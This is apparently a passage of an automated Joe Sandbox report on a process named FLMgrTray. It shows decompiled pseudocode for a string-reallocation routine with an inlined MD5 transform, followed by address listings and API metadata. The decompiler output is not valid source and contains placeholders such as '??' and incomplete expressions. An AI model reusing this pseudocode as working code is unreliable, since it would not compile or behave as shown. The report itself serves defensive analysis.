                                                                                        				intOrPtr _v72;
                                                                                        				intOrPtr _v76;
                                                                                        				signed int _v80;
                                                                                        				signed int _v84;
                                                                                        				signed int _v88;
                                                                                        				signed int _v92;
                                                                                        				intOrPtr _v96;
                                                                                        				intOrPtr* _v100;
                                                                                        				intOrPtr _v104;
                                                                                        				void _v112;
                                                                                        				void* _v116;
                                                                                        				void* __ebp;
                                                                                        				void* _t150;
                                                                                        				void* _t154;
                                                                                        				signed int _t156;
                                                                                        				void* _t158;
                                                                                        				signed char* _t161;
                                                                                        				void* _t387;
                                                                                        				signed int _t390;
                                                                                        				signed int _t394;
                                                                                        				signed int _t395;
                                                                                        				signed int _t396;
                                                                                        				signed int _t399;
                                                                                        				signed int _t401;
                                                                                        				signed int _t403;
                                                                                        				signed int _t407;
                                                                                        				signed int _t409;
                                                                                        				signed int _t411;
                                                                                        				signed int _t413;
                                                                                        				signed int _t417;
                                                                                        				signed int _t419;
                                                                                        				signed int _t421;
                                                                                        				signed int _t424;
                                                                                        				signed int _t425;
                                                                                        				signed int _t427;
                                                                                        				signed int _t428;
                                                                                        				void* _t429;
                                                                                        				void* _t431;
                                                                                        				signed int _t433;
                                                                                        				signed int _t523;
                                                                                        				signed int _t606;
                                                                                        				signed int _t611;
                                                                                        				signed int _t616;
                                                                                        				signed int _t620;
                                                                                        				signed int _t622;
                                                                                        				signed int _t624;
                                                                                        				signed int _t626;
                                                                                        				signed int _t629;
                                                                                        				unsigned int _t634;
                                                                                        				unsigned int _t638;
                                                                                        				signed int _t639;
                                                                                        				signed int _t649;
                                                                                        				signed int _t651;
                                                                                        				signed int _t653;
                                                                                        				signed int _t655;
                                                                                        				signed int _t657;
                                                                                        				signed int _t662;
                                                                                        				signed int _t664;
                                                                                        				signed int _t666;
                                                                                        				signed int _t669;
                                                                                        				signed int _t671;
                                                                                        				signed int _t673;
                                                                                        				signed int _t675;
                                                                                        				signed int _t680;
                                                                                        				signed int _t682;
                                                                                        				signed int _t684;
                                                                                        				signed int _t686;
                                                                                        				signed int _t688;
                                                                                        				signed int _t691;
                                                                                        				signed int _t692;
                                                                                        				void* _t693;
                                                                                        				void* _t694;
                                                                                        				signed int _t695;
                                                                                        				signed int _t698;
                                                                                        				signed int _t700;
                                                                                        				signed int _t702;
                                                                                        				signed int _t705;
                                                                                        				signed int _t709;
                                                                                        				signed int _t711;
                                                                                        				signed int _t713;
                                                                                        				signed int _t715;
                                                                                        				signed int _t718;
                                                                                        				signed int _t720;
                                                                                        				signed int _t722;
                                                                                        				signed int _t724;
                                                                                        				signed int _t726;
                                                                                        				signed int _t728;
                                                                                        				signed int _t730;
                                                                                        				signed int _t732;
                                                                                        				intOrPtr* _t733;
                                                                                        				signed int _t734;
                                                                                        				void* _t735;
                                                                                        				void* _t736;
                                                                                        				signed int* _t738;
                                                                                        				signed int _t739;
                                                                                        				signed int _t742;
                                                                                        				signed int _t744;
                                                                                        				signed int _t746;
                                                                                        				signed int _t748;
                                                                                        				signed int _t753;
                                                                                        				signed int _t755;
                                                                                        				signed int _t757;
                                                                                        				signed int _t761;
                                                                                        				signed int _t763;
                                                                                        				signed int _t765;
                                                                                        				signed int _t767;
                                                                                        				signed int _t769;
                                                                                        				signed int _t771;
                                                                                        				signed int _t773;
                                                                                        				signed int _t776;
                                                                                        				signed int _t783;
                                                                                        				void* _t789;
                                                                                        
                                                                                        				_t736 = __ecx;
                                                                                        				_t692 = _a4;
                                                                                        				_t395 =  *(__ecx + 0x10);
                                                                                        				_v8 = _t395;
                                                                                        				if(_t395 > _t692) {
                                                                                        					L21:
                                                                                        					return _t150;
                                                                                        				} else {
                                                                                        					_t638 =  *(__ecx + 0x14);
                                                                                        					_a4 = _t638;
                                                                                        					_t789 = _t638 - _t692;
                                                                                        					if(_t789 == 0) {
                                                                                        						goto L21;
                                                                                        					} else {
                                                                                        						if(_t789 >= 0) {
                                                                                        							if(_t692 >= 8 || _t638 < 8) {
                                                                                        								goto L21;
                                                                                        							} else {
                                                                                        								_t693 =  *__ecx;
                                                                                        								memcpy(__ecx, _t693, 2 + _t395 * 2);
                                                                                        								_t153 =  *(_t736 + 0x14);
                                                                                        								_t783 = _t783 + 0xc;
                                                                                        								_t431 = 2 +  *(_t736 + 0x14) * 2;
                                                                                        								if(_t431 < 0x1000) {
                                                                                        									L20:
                                                                                        									_push(_t431);
                                                                                        									_t154 = E00175733(_t153, _t693);
                                                                                        									 *(_t736 + 0x14) = 7;
                                                                                        									return _t154;
                                                                                        								}
                                                                                        								_t638 =  *(_t693 - 4);
                                                                                        								_t431 = _t431 + 0x23;
                                                                                        								_t692 = _t693 - _t638;
                                                                                        								_t31 = _t692 - 4; // -4
                                                                                        								_t153 = _t31;
                                                                                        								if(_t31 <= 0x1f) {
                                                                                        									_t693 = _t638;
                                                                                        									goto L20;
                                                                                        								}
                                                                                        								goto L22;
                                                                                        							}
                                                                                        						} else {
                                                                                        							_t431 = _t692 - _t395;
                                                                                        							if(0x7ffffffe - _t395 < _t431) {
                                                                                        								L23:
                                                                                        								E001631F0(_t638);
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								_t782 = _t783;
                                                                                        								_t156 =  *0x19d05c; // 0x2c80d730
                                                                                        								_v28 = _t156 ^ _t783;
                                                                                        								_t158 = _t431;
                                                                                        								_push(_t395);
                                                                                        								_push(_t736);
                                                                                        								_v116 = _t158;
                                                                                        								_t396 =  *(_t158 + 4);
                                                                                        								_v100 =  *((intOrPtr*)(_t158 + 0xc));
                                                                                        								_push(_t692);
                                                                                        								_v104 =  *((intOrPtr*)(_t158 + 8));
                                                                                        								_t161 = _v16 + 2;
                                                                                        								_v112 =  *_t158;
                                                                                        								_t738 =  &_v92;
                                                                                        								_t694 = 0x10;
                                                                                        								asm("o16 nop [eax+eax]");
                                                                                        								do {
                                                                                        									_t639 = _t161[1] & 0x000000ff;
                                                                                        									_t738 = _t738 + 4;
                                                                                        									_t433 =  *_t161 & 0x000000ff;
                                                                                        									_t161 =  &(_t161[4]);
                                                                                        									 *(_t738 - 4) = ((_t639 << 0x00000008 | _t433) << 0x00000008 |  *(_t161 - 5) & 0x000000ff) << 0x00000008 |  *(_t161 - 6) & 0x000000ff;
                                                                                        									_t694 = _t694 - 1;
                                                                                        								} while (_t694 != 0);
                                                                                        								_t695 = _v88;
                                                                                        								_t739 = _v84;
                                                                                        								asm("rol edx, 0x7");
                                                                                        								_t649 = _v96 + 0xd76aa478 + ( !_t396 & _t739 | _t695 & _t396) + _v76 + _t396;
                                                                                        								asm("rol esi, 0xc");
                                                                                        								_t742 = _t739 + 0xe8c7b756 + ( !_t649 & _t695 | _t396 & _t649) + _v72 + _t649;
                                                                                        								asm("ror edi, 0xf");
                                                                                        								_t698 = _t695 + 0x242070db + ( !_t742 & _t396 | _t742 & _t649) + _v68 + _t742;
                                                                                        								asm("ror ebx, 0xa");
                                                                                        								_t399 = _t396 + 0xc1bdceee + ( !_t698 & _t649 | _t742 & _t698) + _v64 + _t698;
                                                                                        								asm("rol edx, 0x7");
                                                                                        								_t651 = _t649 + ( !_t399 & _t742 | _t698 & _t399) + 0xf57c0faf + _v60 + _t399;
                                                                                        								asm("rol esi, 0xc");
                                                                                        								_t744 = _t742 + ( !_t651 & _t698 | _t399 & _t651) + 0x4787c62a + _v56 + _t651;
                                                                                        								asm("ror edi, 0xf");
                                                                                        								_t700 = _t698 + ( !_t744 & _t399 | _t744 & _t651) + 0xa8304613 + _v52 + _t744;
                                                                                        								asm("ror ebx, 0xa");
                                                                                        								_t401 = _t399 + ( !_t700 & _t651 | _t744 & _t700) + 0xfd469501 + _v48 + _t700;
                                                                                        								asm("rol edx, 0x7");
                                                                                        								_t653 = _t651 + ( !_t401 & _t744 | _t700 & _t401) + 0x698098d8 + _v44 + _t401;
                                                                                        								asm("rol esi, 0xc");
                                                                                        								_t746 = _t744 + ( !_t653 & _t700 | _t401 & _t653) + 0x8b44f7af + _v40 + _t653;
                                                                                        								asm("ror edi, 0xf");
                                                                                        								_t702 = _t700 + ( !_t746 & _t401 | _t746 & _t653) + 0xffff5bb1 + _v36 + _t746;
                                                                                        								_v88 = _t702;
                                                                                        								asm("ror ebx, 0xa");
                                                                                        								_t403 = _t401 + ( !_t702 & _t653 | _t746 & _t702) + 0x895cd7be + _v32 + _t702;
                                                                                        								_v92 = _t403;
                                                                                        								asm("rol edx, 0x7");
                                                                                        								_t655 = _t653 + ( !_t403 & _t746 | _t702 & _t403) + 0x6b901122 + _v28 + _t403;
                                                                                        								_v84 = _t655;
                                                                                        								asm("rol edi, 0xc");
                                                                                        								_t705 = _t746 - 0x2678e6d + ( !_t655 & _t702 | _t403 & _t655) + _v24 + _t655;
                                                                                        								_v80 = _t705;
                                                                                        								_t748 =  !_t705;
                                                                                        								asm("ror ebx, 0xf");
                                                                                        								_t407 = _v88 + 0xa679438e + (_t748 & _t403 | _t705 & _t655) + _v20 + _t705;
                                                                                        								_t657 =  !_t407;
                                                                                        								_t523 = _v80;
                                                                                        								asm("ror edi, 0xa");
                                                                                        								_t709 = _v92 + 0x49b40821 + (_t657 & _v84 | _t705 & _t407) + _v16 + _t407;
                                                                                        								asm("rol esi, 0x5");
                                                                                        								_t753 = (_t748 & _t407 | _t523 & _t709) + _v72 + _v84 + 0xf61e2562 + _t709;
                                                                                        								asm("rol edx, 0x9");
                                                                                        								_t662 = (_t657 & _t709 | _t407 & _t753) + _v52 + _t523 + 0xc040b340 + _t753;
                                                                                        								asm("rol ebx, 0xe");
                                                                                        								_t409 = _t407 + ( !_t709 & _t753 | _t662 & _t709) + 0x265e5a51 + _v32 + _t662;
                                                                                        								asm("ror edi, 0xc");
                                                                                        								_t711 = _t709 + ( !_t753 & _t662 | _t409 & _t753) + 0xe9b6c7aa + _v76 + _t409;
                                                                                        								asm("rol esi, 0x5");
                                                                                        								_t755 = _t753 + ( !_t662 & _t409 | _t662 & _t711) + 0xd62f105d + _v56 + _t711;
                                                                                        								asm("rol edx, 0x9");
                                                                                        								_t664 = _t662 + ( !_t409 & _t711 | _t409 & _t755) + 0x2441453 + _v36 + _t755;
                                                                                        								asm("rol ebx, 0xe");
                                                                                        								_t411 = _t409 + ( !_t711 & _t755 | _t664 & _t711) + 0xd8a1e681 + _v16 + _t664;
                                                                                        								asm("ror edi, 0xc");
                                                                                        								_t713 = _t711 + ( !_t755 & _t664 | _t411 & _t755) + 0xe7d3fbc8 + _v60 + _t411;
                                                                                        								asm("rol esi, 0x5");
                                                                                        								_t757 = _t755 + ( !_t664 & _t411 | _t664 & _t713) + 0x21e1cde6 + _v40 + _t713;
                                                                                        								asm("rol edx, 0x9");
                                                                                        								_t666 = _t664 + ( !_t411 & _t713 | _t411 & _t757) + 0xc33707d6 + _v20 + _t757;
                                                                                        								_v80 = _t666;
                                                                                        								asm("rol ebx, 0xe");
                                                                                        								_t413 = _t411 + ( !_t713 & _t757 | _t666 & _t713) + 0xf4d50d87 + _v64 + _t666;
                                                                                        								asm("ror edi, 0xc");
                                                                                        								_t715 = _t713 + ( !_t757 & _t666 | _t413 & _t757) + 0x455a14ed + _v44 + _t413;
                                                                                        								_v92 = _t715;
                                                                                        								asm("rol edx, 0x5");
                                                                                        								_t669 = _t757 - 0x561c16fb + ( !_t666 & _t413 | _t666 & _t715) + _v24 + _t715;
                                                                                        								asm("rol esi, 0x9");
                                                                                        								_t761 = _v80 + 0xfcefa3f8 + ( !_t413 & _t715 | _t413 & _t669) + _v68 + _t669;
                                                                                        								asm("rol edi, 0xe");
                                                                                        								_t718 = _t413 + 0x676f02d9 + ( !_t715 & _t669 | _t761 & _t715) + _v48 + _t761;
                                                                                        								asm("ror ebx, 0xc");
                                                                                        								_t417 = _v92 + 0x8d2a4c8a + ( !_t669 & _t761 | _t718 & _t669) + _v28 + _t718;
                                                                                        								asm("rol edx, 0x4");
                                                                                        								_t671 = _t669 + (_t761 ^ _t718 ^ _t417) + 0xfffa3942 + _v56 + _t417;
                                                                                        								asm("rol esi, 0xb");
                                                                                        								_t763 = _t761 + (_t718 ^ _t417 ^ _t671) + 0x8771f681 + _v44 + _t671;
                                                                                        								asm("rol edi, 0x10");
                                                                                        								_t720 = _t718 + (_t763 ^ _t417 ^ _t671) + 0x6d9d6122 + _v32 + _t763;
                                                                                        								_t606 = _t763 ^ _t720;
                                                                                        								asm("ror ebx, 0x9");
                                                                                        								_t419 = _t417 + (_t606 ^ _t671) + 0xfde5380c + _v20 + _t720;
                                                                                        								asm("rol edx, 0x4");
                                                                                        								_t673 = _t671 + (_t606 ^ _t419) + 0xa4beea44 + _v72 + _t419;
                                                                                        								asm("rol esi, 0xb");
                                                                                        								_t765 = _t763 + (_t720 ^ _t419 ^ _t673) + 0x4bdecfa9 + _v60 + _t673;
                                                                                        								asm("rol edi, 0x10");
                                                                                        								_t722 = _t720 + (_t765 ^ _t419 ^ _t673) + 0xf6bb4b60 + _v48 + _t765;
                                                                                        								_t611 = _t765 ^ _t722;
                                                                                        								asm("ror ebx, 0x9");
                                                                                        								_t421 = _t419 + (_t611 ^ _t673) + 0xbebfbc70 + _v36 + _t722;
                                                                                        								asm("rol edx, 0x4");
                                                                                        								_t675 = _t673 + (_t611 ^ _t421) + 0x289b7ec6 + _v24 + _t421;
                                                                                        								_v80 = _t675;
                                                                                        								asm("rol esi, 0xb");
                                                                                        								_t767 = _t765 + (_t722 ^ _t421 ^ _t675) + 0xeaa127fa + _v76 + _t675;
                                                                                        								asm("rol edi, 0x10");
                                                                                        								_t724 = _t722 + (_t767 ^ _t421 ^ _t675) + 0xd4ef3085 + _v64 + _t767;
                                                                                        								_t616 = _t767 ^ _t724;
                                                                                        								asm("ror edx, 0x9");
                                                                                        								_t680 = (_t675 ^ _t616) + 0x4881d05 + _v52 + _t421 + _t724;
                                                                                        								asm("rol ecx, 0x4");
                                                                                        								_t620 = (_t616 ^ _t680) + _v40 + _v80 + 0xd9d4d039 + _t680;
                                                                                        								asm("rol esi, 0xb");
                                                                                        								_t769 = _t767 + (_t724 ^ _t680 ^ _t620) + 0xe6db99e5 + _v28 + _t620;
                                                                                        								asm("rol edi, 0x10");
                                                                                        								_t726 = _t724 + (_t769 ^ _t680 ^ _t620) + 0x1fa27cf8 + _v16 + _t769;
                                                                                        								asm("ror edx, 0x9");
                                                                                        								_t682 = _t680 + (_t769 ^ _t726 ^ _t620) + 0xc4ac5665 + _v68 + _t726;
                                                                                        								asm("rol ecx, 0x6");
                                                                                        								_t622 = _t620 + (( !_t769 | _t682) ^ _t726) + 0xf4292244 + _v76 + _t682;
                                                                                        								asm("rol esi, 0xa");
                                                                                        								_t771 = _t769 + (( !_t726 | _t622) ^ _t682) + 0x432aff97 + _v48 + _t622;
                                                                                        								asm("rol edi, 0xf");
                                                                                        								_t728 = _t726 + (( !_t682 | _t771) ^ _t622) + 0xab9423a7 + _v20 + _t771;
                                                                                        								asm("ror edx, 0xb");
                                                                                        								_t684 = _t682 + (( !_t622 | _t728) ^ _t771) + 0xfc93a039 + _v56 + _t728;
                                                                                        								asm("rol ecx, 0x6");
                                                                                        								_t624 = _t622 + (( !_t771 | _t684) ^ _t728) + 0x655b59c3 + _v28 + _t684;
                                                                                        								asm("rol esi, 0xa");
                                                                                        								_t773 = _t771 + (( !_t728 | _t624) ^ _t684) + 0x8f0ccc92 + _v64 + _t624;
                                                                                        								asm("rol edi, 0xf");
                                                                                        								_t730 = _t728 + (( !_t684 | _t773) ^ _t624) + 0xffeff47d + _v36 + _t773;
                                                                                        								asm("ror edx, 0xb");
                                                                                        								_t686 = _t684 + (( !_t624 | _t730) ^ _t773) + 0x85845dd1 + _v72 + _t730;
                                                                                        								asm("rol ecx, 0x6");
                                                                                        								_t626 = _t624 + (( !_t773 | _t686) ^ _t730) + 0x6fa87e4f + _v44 + _t686;
                                                                                        								asm("rol ebx, 0xa");
                                                                                        								_t424 = _t773 - 0x1d31920 + (( !_t730 | _t626) ^ _t686) + _v16 + _t626;
                                                                                        								asm("rol edi, 0xf");
                                                                                        								_t732 = _t730 + (( !_t686 | _t424) ^ _t626) + 0xa3014314 + _v52 + _t424;
                                                                                        								asm("ror edx, 0xb");
                                                                                        								_t688 = _t686 + (( !_t626 | _t732) ^ _t424) + 0x4e0811a1 + _v24 + _t732;
                                                                                        								_v80 = _t688;
                                                                                        								_t733 = _v100;
                                                                                        								asm("rol esi, 0x6");
                                                                                        								_t776 = _t626 - 0x8ac817e + (( !_t424 | _t688) ^ _t732) + _v60 + _t688;
                                                                                        								_t425 = _v80;
                                                                                        								asm("rol edx, 0xa");
                                                                                        								_t691 = _t424 - 0x42c50dcb + (( !_t732 | _t776) ^ _t688) + _v32 + _t776;
                                                                                        								asm("rol ecx, 0xf");
                                                                                        								_t629 = _t732 + 0x2ad7d2bb + (( !_t425 | _t691) ^ _t776) + _v68 + _t691;
                                                                                        								 *_t733 = _v96 + _t776;
                                                                                        								 *((intOrPtr*)(_t733 + 8)) =  *((intOrPtr*)(_t733 + 8)) + _t629;
                                                                                        								asm("ror eax, 0xb");
                                                                                        								 *((intOrPtr*)(_t733 + 0xc)) =  *((intOrPtr*)(_t733 + 0xc)) + _t691;
                                                                                        								 *((intOrPtr*)(_t733 + 4)) = _t425 - 0x14792c6f + (( !_t776 | _t629) ^ _t691) + _v40 +  *((intOrPtr*)(_t733 + 4)) + _t629;
                                                                                        								return E001755F4(_v12 ^ _t782);
                                                                                        							} else {
                                                                                        								_t427 = _t692 | 0x00000007;
                                                                                        								if(_t427 <= 0x7ffffffe) {
                                                                                        									_t634 = _t638 >> 1;
                                                                                        									if(_t638 <= 0x7ffffffe - _t634) {
                                                                                        										_t428 =  <  ? _t634 + _t638 : _t427;
                                                                                        									} else {
                                                                                        										_t428 = 0x7ffffffe;
                                                                                        									}
                                                                                        								} else {
                                                                                        									_t428 = 0x7ffffffe;
                                                                                        								}
                                                                                        								_t7 = _t428 + 1; // 0x7fffffff
                                                                                        								_t387 = E00163260(_t638, _t7);
                                                                                        								 *(_t736 + 0x10) = _t692;
                                                                                        								_t734 = _a4;
                                                                                        								_v12 = _t387;
                                                                                        								 *(_t736 + 0x14) = _t428;
                                                                                        								_push(2 + _v8 * 2);
                                                                                        								if(_t734 < 8) {
                                                                                        									memcpy(_t387, _t736, ??);
                                                                                        									 *_t736 = _v12;
                                                                                        									_t390 = _v8;
                                                                                        									 *(_t736 + 0x10) = _t390;
                                                                                        									return _t390;
                                                                                        								} else {
                                                                                        									_t429 =  *_t736;
                                                                                        									_t391 = memcpy(_t387, _t429, ??);
                                                                                        									_t735 = 2 + _t734 * 2;
                                                                                        									_t783 = _t783 + 0xc;
                                                                                        									if(_t735 < 0x1000) {
                                                                                        										L13:
                                                                                        										_push(_t735);
                                                                                        										E00175733(_t391, _t429);
                                                                                        										 *_t736 = _v12;
                                                                                        										_t394 = _v8;
                                                                                        										 *(_t736 + 0x10) = _t394;
                                                                                        										return _t394;
                                                                                        									} else {
                                                                                        										_t431 =  *(_t429 - 4);
                                                                                        										_t692 = _t735 + 0x23;
                                                                                        										_t395 = _t429 - _t431;
                                                                                        										_t18 = _t395 - 4; // 0x7ffffffa
                                                                                        										_t391 = _t18;
                                                                                        										if(_t18 > 0x1f) {
                                                                                        											L22:
                                                                                        											__imp___invalid_parameter_noinfo_noreturn();
                                                                                        											goto L23;
                                                                                        										} else {
                                                                                        											_t429 = _t431;
                                                                                        											goto L13;
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        			}



































































































































                                                                                        0x0016a8a8
                                                                                        0x0016a8ab
                                                                                        0x0016a8ae
                                                                                        0x0016a8b1
                                                                                        0x0016a8b6
                                                                                        0x0016aa02
                                                                                        0x0016aa02
                                                                                        0x0016a8bc
                                                                                        0x0016a8bc
                                                                                        0x0016a8bf
                                                                                        0x0016a8c2
                                                                                        0x0016a8c4
                                                                                        0x00000000
                                                                                        0x0016a8ca
                                                                                        0x0016a8ca
                                                                                        0x0016a9ac
                                                                                        0x00000000
                                                                                        0x0016a9b3
                                                                                        0x0016a9b3
                                                                                        0x0016a9bf
                                                                                        0x0016a9c4
                                                                                        0x0016a9c7
                                                                                        0x0016a9ca
                                                                                        0x0016a9d7
                                                                                        0x0016a9eb
                                                                                        0x0016a9eb
                                                                                        0x0016a9ed
                                                                                        0x0016a9f5
                                                                                        0x00000000
                                                                                        0x0016a9f5
                                                                                        0x0016a9d9
                                                                                        0x0016a9dc
                                                                                        0x0016a9df
                                                                                        0x0016a9e1
                                                                                        0x0016a9e1
                                                                                        0x0016a9e7
                                                                                        0x0016a9e9
                                                                                        0x00000000
                                                                                        0x0016a9e9
                                                                                        0x00000000
                                                                                        0x0016a9e7
                                                                                        0x0016a8d0
                                                                                        0x0016a8d7
                                                                                        0x0016a8dd
                                                                                        0x0016aa0b
                                                                                        0x0016aa0b
                                                                                        0x0016aa10
                                                                                        0x0016aa11
                                                                                        0x0016aa12
                                                                                        0x0016aa13
                                                                                        0x0016aa14
                                                                                        0x0016aa15
                                                                                        0x0016aa16
                                                                                        0x0016aa17
                                                                                        0x0016aa18
                                                                                        0x0016aa19
                                                                                        0x0016aa1a
                                                                                        0x0016aa1b
                                                                                        0x0016aa1c
                                                                                        0x0016aa1d
                                                                                        0x0016aa1e
                                                                                        0x0016aa1f
                                                                                        0x0016aa21
                                                                                        0x0016aa26
                                                                                        0x0016aa2d
                                                                                        0x0016aa30
                                                                                        0x0016aa32
                                                                                        0x0016aa33
                                                                                        0x0016aa34
                                                                                        0x0016aa3c
                                                                                        0x0016aa42
                                                                                        0x0016aa48
                                                                                        0x0016aa49
                                                                                        0x0016aa4c
                                                                                        0x0016aa4f
                                                                                        0x0016aa52
                                                                                        0x0016aa55
                                                                                        0x0016aa5a
                                                                                        0x0016aa60
                                                                                        0x0016aa60
                                                                                        0x0016aa64
                                                                                        0x0016aa67
                                                                                        0x0016aa6a
                                                                                        0x0016aa84
                                                                                        0x0016aa87
                                                                                        0x0016aa87
                                                                                        0x0016aa8c
                                                                                        0x0016aa93
                                                                                        0x0016aab4
                                                                                        0x0016aab7
                                                                                        0x0016aace
                                                                                        0x0016aad1
                                                                                        0x0016aaec
                                                                                        0x0016aaef
                                                                                        0x0016ab02
                                                                                        0x0016ab05
                                                                                        0x0016ab1e
                                                                                        0x0016ab21
                                                                                        0x0016ab38
                                                                                        0x0016ab3b
                                                                                        0x0016ab54
                                                                                        0x0016ab57
                                                                                        0x0016ab72
                                                                                        0x0016ab75
                                                                                        0x0016ab8e
                                                                                        0x0016ab91
                                                                                        0x0016aba8
                                                                                        0x0016abab
                                                                                        0x0016abc6
                                                                                        0x0016abc9
                                                                                        0x0016abcd
                                                                                        0x0016abe5
                                                                                        0x0016abe8
                                                                                        0x0016abec
                                                                                        0x0016ac04
                                                                                        0x0016ac07
                                                                                        0x0016ac0b
                                                                                        0x0016ac21
                                                                                        0x0016ac24
                                                                                        0x0016ac26
                                                                                        0x0016ac2b
                                                                                        0x0016ac47
                                                                                        0x0016ac4a
                                                                                        0x0016ac53
                                                                                        0x0016ac69
                                                                                        0x0016ac6e
                                                                                        0x0016ac71
                                                                                        0x0016ac8e
                                                                                        0x0016ac91
                                                                                        0x0016aca0
                                                                                        0x0016aca5
                                                                                        0x0016acbc
                                                                                        0x0016acc1
                                                                                        0x0016acda
                                                                                        0x0016acdf
                                                                                        0x0016acf2
                                                                                        0x0016acf7
                                                                                        0x0016ad10
                                                                                        0x0016ad15
                                                                                        0x0016ad2c
                                                                                        0x0016ad31
                                                                                        0x0016ad4a
                                                                                        0x0016ad4f
                                                                                        0x0016ad66
                                                                                        0x0016ad6b
                                                                                        0x0016ad80
                                                                                        0x0016ad85
                                                                                        0x0016ad89
                                                                                        0x0016ad9f
                                                                                        0x0016ada2
                                                                                        0x0016adbb
                                                                                        0x0016adc0
                                                                                        0x0016adc4
                                                                                        0x0016addd
                                                                                        0x0016ade0
                                                                                        0x0016adf9
                                                                                        0x0016adfe
                                                                                        0x0016ae1c
                                                                                        0x0016ae21
                                                                                        0x0016ae34
                                                                                        0x0016ae37
                                                                                        0x0016ae49
                                                                                        0x0016ae4c
                                                                                        0x0016ae5a
                                                                                        0x0016ae5d
                                                                                        0x0016ae71
                                                                                        0x0016ae74
                                                                                        0x0016ae76
                                                                                        0x0016ae88
                                                                                        0x0016ae8b
                                                                                        0x0016ae9a
                                                                                        0x0016ae9d
                                                                                        0x0016aead
                                                                                        0x0016aeb0
                                                                                        0x0016aec4
                                                                                        0x0016aec7
                                                                                        0x0016aec9
                                                                                        0x0016aedb
                                                                                        0x0016aede
                                                                                        0x0016aeef
                                                                                        0x0016aef2
                                                                                        0x0016aef6
                                                                                        0x0016af03
                                                                                        0x0016af06
                                                                                        0x0016af1d
                                                                                        0x0016af25
                                                                                        0x0016af27
                                                                                        0x0016af36
                                                                                        0x0016af39
                                                                                        0x0016af46
                                                                                        0x0016af49
                                                                                        0x0016af57
                                                                                        0x0016af5a
                                                                                        0x0016af6e
                                                                                        0x0016af71
                                                                                        0x0016af85
                                                                                        0x0016af88
                                                                                        0x0016af9c
                                                                                        0x0016af9f
                                                                                        0x0016afb3
                                                                                        0x0016afb6
                                                                                        0x0016afca
                                                                                        0x0016afcd
                                                                                        0x0016afe1
                                                                                        0x0016afe4
                                                                                        0x0016aff8
                                                                                        0x0016affb
                                                                                        0x0016b00f
                                                                                        0x0016b012
                                                                                        0x0016b026
                                                                                        0x0016b029
                                                                                        0x0016b03b
                                                                                        0x0016b040
                                                                                        0x0016b05a
                                                                                        0x0016b05d
                                                                                        0x0016b070
                                                                                        0x0016b075
                                                                                        0x0016b089
                                                                                        0x0016b08c
                                                                                        0x0016b0a6
                                                                                        0x0016b0a9
                                                                                        0x0016b0ad
                                                                                        0x0016b0bb
                                                                                        0x0016b0be
                                                                                        0x0016b0c1
                                                                                        0x0016b0d0
                                                                                        0x0016b0d5
                                                                                        0x0016b0dc
                                                                                        0x0016b0ec
                                                                                        0x0016b0ef
                                                                                        0x0016b0f1
                                                                                        0x0016b0f3
                                                                                        0x0016b107
                                                                                        0x0016b10f
                                                                                        0x0016b115
                                                                                        0x0016b125
                                                                                        0x0016a8e3
                                                                                        0x0016a8e5
                                                                                        0x0016a8ee
                                                                                        0x0016a8fe
                                                                                        0x0016a904
                                                                                        0x0016a912
                                                                                        0x0016a906
                                                                                        0x0016a906
                                                                                        0x0016a906
                                                                                        0x0016a8f0
                                                                                        0x0016a8f0
                                                                                        0x0016a8f0
                                                                                        0x0016a915
                                                                                        0x0016a91b
                                                                                        0x0016a923
                                                                                        0x0016a926
                                                                                        0x0016a929
                                                                                        0x0016a92c
                                                                                        0x0016a936
                                                                                        0x0016a93a
                                                                                        0x0016a98d
                                                                                        0x0016a998
                                                                                        0x0016a99a
                                                                                        0x0016a99d
                                                                                        0x0016a9a6
                                                                                        0x0016a93c
                                                                                        0x0016a93c
                                                                                        0x0016a940
                                                                                        0x0016a945
                                                                                        0x0016a94c
                                                                                        0x0016a955
                                                                                        0x0016a96d
                                                                                        0x0016a96d
                                                                                        0x0016a96f
                                                                                        0x0016a97a
                                                                                        0x0016a97c
                                                                                        0x0016a97f
                                                                                        0x0016a988
                                                                                        0x0016a957
                                                                                        0x0016a957
                                                                                        0x0016a95a
                                                                                        0x0016a95d
                                                                                        0x0016a95f
                                                                                        0x0016a95f
                                                                                        0x0016a965
                                                                                        0x0016aa05
                                                                                        0x0016aa05
                                                                                        0x00000000
                                                                                        0x0016a96b
                                                                                        0x0016a96b
                                                                                        0x00000000
                                                                                        0x0016a96b
                                                                                        0x0016a965
                                                                                        0x0016a955
                                                                                        0x0016a93a
                                                                                        0x0016a8dd
                                                                                        0x0016a8ca
                                                                                        0x0016a8c4

                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,00000001,00000001,00000005,00000000,00000000,00000000), ref: 0016A940
                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,00000001,00000001,00000005,00000000,00000000,00000000), ref: 0016A98D
                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,?,00000005,00000000,00000000,00000000), ref: 0016A9BF
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000005,00000000,00000000,00000000), ref: 0016AA05
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2665656946-0
                                                                                        • Opcode ID: 480d4c06580df3adaeaa566ba0e6da7fb81f71a87ba200d86c275363ddd15303
